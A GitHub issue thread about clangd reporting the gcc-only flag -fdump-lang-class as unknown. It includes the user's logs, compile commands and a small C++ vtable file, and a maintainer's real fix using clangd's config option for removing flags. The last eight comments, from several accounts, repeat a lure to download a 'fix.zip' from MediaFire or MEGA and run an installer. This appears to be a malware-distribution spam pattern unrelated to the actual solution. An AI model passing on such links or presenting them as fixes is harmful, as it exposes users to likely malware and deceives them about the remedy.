### ISSUE TITLE
Unknown argument clangd error insight with gcc option

### ISSUE THREAD

**Issue by qiyuewuyi2333** [clangd/clangd#2126]
I'm using clangd extension in vscode. I try to use gcc compiler to learn the vtable mechanism. It's ok to compile and link. I successfully get what i want. But there is a slight fault in clangd error insight. Please see the snip below:
![image](https://github.com/user-attachments/assets/3ef6be8a-6109-4ad2-88ae-9b5ace0e951b)

I don't know why it doesn't identify my gcc option. 
I want to know how to fix it. Thanks for your help.

There are more information below:

**Logs**
output in vscode
```
I[12:47:47.219] <-- textDocument/didOpen
I[12:47:47.225] ASTWorker building file f:\dev\VS\cpp\code_for_algo\src\exp\virtual_learn\virtual_function.cpp version 64 with command 
[F:/dev/VS/cpp/code_for_algo/out/build]
"C:\\Program Files\\mingw64\\bin\\G__~1.EXE" -IF:/dev/VS/cpp/code_for_algo/include -g -std=gnu++23 -fdump-lang-class -o "CMakeFiles\\code_for_algo.dir\\src\\exp\\virtual_learn\\virtual_function.cpp.obj" -c "-resource-dir=F:\\LLVM\\lib\\clang\\18" -- "f:\\dev\\VS\\cpp\\code_for_algo\\src\\exp\\virtual_learn\\virtual_function.cpp"
I[12:47:47.236] <-- textDocument/codeAction(48)
I[12:47:47.237] <-- textDocument/documentSymbol(49)
I[12:47:47.254] --> textDocument/clangd.fileStatus
I[12:47:47.282] Built preamble of size 240552 for file f:\dev\VS\cpp\code_for_algo\src\exp\virtual_learn\virtual_function.cpp version 64 in 0.03 seconds
I[12:47:47.282] --> workspace/semanticTokens/refresh(2)
I[12:47:47.283] <-- reply(2)
I[12:47:47.353] --> textDocument/publishDiagnostics
I[12:47:47.353] --> textDocument/inactiveRegions
I[12:47:47.353] --> reply:textDocument/codeAction(48) 116 ms
I[12:47:47.354] --> reply:textDocument/documentSymbol(49) 116 ms
I[12:47:47.354] --> textDocument/clangd.fileStatus
I[12:47:47.435] <-- textDocument/semanticTokens/full(50)
I[12:47:47.436] --> reply:textDocument/semanticTokens/full(50) 0 ms
I[12:47:47.436] --> textDocument/clangd.fileStatus
I[12:47:47.438] <-- textDocument/documentLink(51)
I[12:47:47.438] --> reply:textDocument/documentLink(51) 0 ms
I[12:47:47.438] --> textDocument/clangd.fileStatus
I[12:47:47.439] <-- textDocument/inlayHint(52)
I[12:47:47.439] --> reply:textDocument/inlayHint(52) 0 ms
I[12:47:47.439] --> textDocument/clangd.fileStatus
I[12:47:47.442] <-- textDocument/foldingRange(53)
I[12:47:47.443] --> reply:textDocument/foldingRange(53) 0 ms
I[12:47:47.524] <-- textDocument/documentSymbol(54)
I[12:47:47.524] --> reply:textDocument/documentSymbol(54) 0 ms
I[12:47:47.525] --> textDocument/clangd.fileStatus
I[12:47:47.718] <-- textDocument/codeAction(55)
I[12:47:47.719] --> reply:textDocument/codeAction(55) 0 ms
I[12:47:47.719] --> textDocument/clangd.fileStatus
I[12:47:47.768] <-- textDocument/semanticTokens/full/delta(56)
I[12:47:47.768] --> reply:textDocument/semanticTokens/full/delta(56) 0 ms
I[12:47:47.768] --> textDocument/clangd.fileStatus

```

**My compile_commands.json file:**
```json
[
{
  "directory": "F:/dev/VS/cpp/code_for_algo/out/build",
  "command": "C:\\PROGRA~1\\mingw64\\bin\\G__~1.EXE  @CMakeFiles/code_for_algo.dir/includes_CXX.rsp -g -std=gnu++23 -fdump-lang-class -o CMakeFiles\\code_for_algo.dir\\src\\exp\\virtual_learn\\virtual_function.cpp.obj -c F:\\dev\\VS\\cpp\\code_for_algo\\src\\exp\\virtual_learn\\virtual_function.cpp",
  "file": "F:/dev/VS/cpp/code_for_algo/src/exp/virtual_learn/virtual_function.cpp",
  "output": "CMakeFiles/code_for_algo.dir/src/exp/virtual_learn/virtual_function.cpp.obj"
}
]
```

**My source file:**
```cpp

class Base
{
  public:
    Base()
    {
    }
    Base(const Base&) = default;
    Base(Base&&) = delete;
    Base& operator=(const Base&) = default;
    Base& operator=(Base&&) = delete;
    ~Base()
    {
    }
    virtual void vhello()
    {
    }
    virtual int vBack()
    {
        return 0;
    }
};
class Derived : public Base
{

  public:
    int id;
    char name1;
    char name2;

  public:
    Derived()
    {
    }
    Derived(const Derived&) = default;
    Derived(Derived&&) = delete;
    Derived& operator=(const Derived&) = default;
    Derived& operator=(Derived&&) = delete;
    ~Derived()
    {
    }
    virtual void vhello()
    {
    }
    virtual int vBack()
    {
        return 0;
    }
};

int main(int argc, char** argv)
{
    // Derived derived;
    
    return 0;
}
```
**System information**

Output of `clangd --version`:
clangd version 18.1.3
Features: windows
Platform: x86_64-pc-windows-msvc

Editor/LSP plugin:
vscode 
clangd plugin : https://marketplace.visualstudio.com/items?itemName=llvm-vs-code-extensions.vscode-clangd
cmake and cmaketools
Operating system: 
windows10

**Comment by HighCommander4** [comment]
The compatibility between gcc and clang command line arguments is not perfect; there are some arguments which are supported by gcc and not clang, and it looks like `-fdump-lang-class` is one of them.

You can remove flags like this from the compile command for clangd's purposes (without removing them from your project's actual build) using https://clangd.llvm.org/config.html#remove.

**Comment by qiyuewuyi2333** [comment]
> The compatibility between gcc and clang command line arguments is not perfect; there are some arguments which are supported by gcc and not clang, and it looks like `-fdump-lang-class` is one of them.
> 
> You can remove flags like this from the compile command for clangd's purposes (without removing them from your project's actual build) using https://clangd.llvm.org/config.html#remove.

OK, I finished off my question. Thanks for your reply.
By the way, Is there a easy-using command option in clang like `-fdump-lang-class` in GCC ?

**Comment by HighCommander4** [comment]
> By the way, Is there a easy-using command option in clang like `-fdump-lang-class` in GCC ?

I couldn't find one through a quick search of https://clang.llvm.org/docs/ClangCommandLineReference.html.

But you could ask in https://discourse.llvm.org/c/clang/using-clang/47 to be more sure.

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
